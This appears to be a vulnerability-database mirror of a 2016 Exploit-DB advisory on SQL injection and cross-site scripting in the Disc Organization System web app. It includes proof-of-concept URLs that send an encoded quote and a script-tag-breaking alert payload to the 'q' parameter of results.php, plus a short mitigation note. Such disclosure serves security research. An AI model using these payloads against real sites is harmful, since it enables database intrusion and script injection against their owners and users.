header-logo
Suggest Exploit
vendor:
Disc Organization System
by:
SECUPENT
7,5
CVSS
HIGH
SQL Injection and Cross Site Scripting
89 (SQL Injection) and 79 (Cross-site Scripting)
CWE
Product Name: Disc Organization System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

DORG – Disc Organization System SQL Injection And Cross Site Scripting

DORG is vulnerable to SQL Injection and Cross Site Scripting. An attacker can inject malicious SQL queries into the vulnerable parameter 'q' in the 'results.php' page. An attacker can also inject malicious JavaScript code into the vulnerable parameter 'q' in the 'results.php' page.

Mitigation:

Input validation should be used to prevent SQL Injection and Cross Site Scripting attacks. Sanitize user input and escape special characters.
Source

Exploit-DB raw data:

Exploit Title:  DORG - Disc Organization System SQL Injection And Cross Site Scripting 
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016


SQL Injection: 

link: http://localhost/dorg/results.php?q=3&search=%2527&type=3

Screenshot: http://secupent.com/exploit/images/drogsql.jpg

Cross Site Scripting (XSS):

link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3

Screenshot: http://secupent.com/exploit/images/drogxss.jpg

Navigation

Suggest Exploit

Services By CQR